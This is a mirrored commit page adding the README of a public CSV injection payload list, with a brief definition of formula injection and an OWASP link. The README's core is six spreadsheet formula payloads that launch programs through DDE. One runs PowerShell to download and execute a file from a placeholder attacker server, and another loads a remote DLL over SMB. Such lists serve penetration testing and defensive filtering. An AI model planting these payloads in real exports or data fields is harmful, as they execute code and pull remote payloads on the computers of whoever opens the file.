External/csv-injection-payloads
1
0
Fork 0
mirror of https://github.com/payloadbox/csv-injection-payloads.git synced 2025-12-17 09:45:30 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1 from payloadbox/readme-file-update

Browse Source 
Update README.md
This commit is contained in:
İsmail Taşdelen 2020-06-28 12:17:59 +03:00 committed by GitHub
commit 83d615fb83
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 37 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

37
README.md
View File

@ -1 +1,38 @@
## CSV Injection Payloads
CSV Injection, also known as Formula Injection, occurs when websites embed untrusted input inside CSV files.
#### Payloads :
```
DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+9)*cmd|' /C calc'!A0
=10+20+cmd|' /C calc'!A0
=cmd|' /C notepad'!'A1'
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
=cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
```
#### References :
###### CSV Injection :
* 👉 https://owasp.org/www-community/attacks/CSV_Injection
##### Cloning an Existing Repository ( Clone with HTTPS )
```
root@ismailtasdelen:~# git clone https://github.com/payloadbox/csv-injection-payloads.git
```
##### Cloning an Existing Repository ( Clone with SSH )
```
root@ismailtasdelen:~# git clone git@github.com:payloadbox/csv-injection-payloads.git
```
#### Donate!
Support the authors:
#### LiberaPay:
<noscript><a href="https://liberapay.com/ismailtasdelen/donate"><img alt="Donate using Liberapay" src="https://liberapay.com/assets/widgets/donate.svg"></a></noscript>